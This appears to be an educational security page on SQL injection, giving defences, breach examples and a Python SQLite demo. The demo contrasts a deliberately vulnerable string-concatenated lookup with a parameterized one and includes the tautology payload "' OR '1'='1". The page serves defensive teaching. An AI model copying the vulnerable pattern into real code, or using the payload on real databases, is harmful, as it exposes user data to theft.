Threats

SQL Injection

SQL injection is an attack where untrusted input changes the meaning of a database query.

  • Never concatenate user input directly into SQL query strings.
  • Parameterized queries and prepared statements are the primary defense.
  • Input validation alone is not sufficient to prevent SQL injection.
  • Least-privilege database accounts limit damage if injection succeeds.
  • Monitor for unusual query patterns, errors, and bulk data access.

What is it and why it matters

SQL injection occurs when an application passes untrusted user input into a SQL query without proper sanitization, allowing an attacker to alter the query’s logic. By injecting SQL fragments through form fields, URL parameters, or HTTP headers, attackers can read sensitive data, modify database records, execute administrative operations, and in some cases issue commands to the underlying operating system. It consistently ranks among the OWASP Top 10 and remains a leading cause of data breaches because a single vulnerable parameter can expose entire databases.
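The following added example (not code from the original page) puts the vulnerable pattern beside the parameterized form the summary recommends. It uses an in-memory SQLite table with constructed sample users and a hypothetical name lookup; it also shows why rejecting quote characters is not a substitute for parameters, since legitimate data such as "o'brien" contains them.

```python
import sqlite3

# Constructed sample data for the demonstration; not from the page.
USERS = [
    ("alice", "alice@example.com"),
    ("bob", "bob@example.com"),
    ("o'brien", "ob@example.com"),   # a legitimate value containing a quote
]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn

def lookup_vulnerable(conn, name):
    # Vulnerable: the input is spliced into the SQL text, so any quote in it
    # becomes part of the query's grammar instead of part of the data.
    sql = "SELECT name, email FROM users WHERE name = '" + name + "' ORDER BY name"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, name):
    # Hardened: the query structure is fixed and the value is bound as a
    # parameter, so the database treats it as one opaque string no matter
    # which characters it contains.
    sql = "SELECT name, email FROM users WHERE name = ? ORDER BY name"
    return conn.execute(sql, (name,)).fetchall()

def demo():
    """Run both lookups on a normal name, a quoted name and a crafted input."""
    conn = make_db()
    crafted = "' OR '1'='1"   # constructed input that closes the quote and adds a tautology
    results = {
        "vuln_normal": lookup_vulnerable(conn, "alice"),
        "vuln_crafted": lookup_vulnerable(conn, crafted),   # returns every row
        "safe_normal": lookup_safe(conn, "alice"),
        "safe_crafted": lookup_safe(conn, crafted),         # matches nothing
        "safe_quoted": lookup_safe(conn, "o'brien"),        # quote handled correctly
    }
    try:
        lookup_vulnerable(conn, "o'brien")
        results["vuln_quoted_error"] = False
    except sqlite3.OperationalError:
        # The concatenated query is malformed for ordinary quoted data too,
        # so the bug breaks correctness, not only security.
        results["vuln_quoted_error"] = True
    return results

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```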

Real world examples

  • Heartland Payment Systems breach (2008) — Albert Gonzalez used SQL injection to steal over 130 million credit card numbers in one of the largest payment card breaches ever recorded.
  • TalkTalk breach (2015) — A SQL injection vulnerability in a legacy web portal exposed personal data of over 150,000 UK customers and led to a £400,000 ICO fine.
  • Sony Pictures breach (2011) — An attack that relied on SQL injection leaked passwords and personal data for over one million Sony Pictures accounts.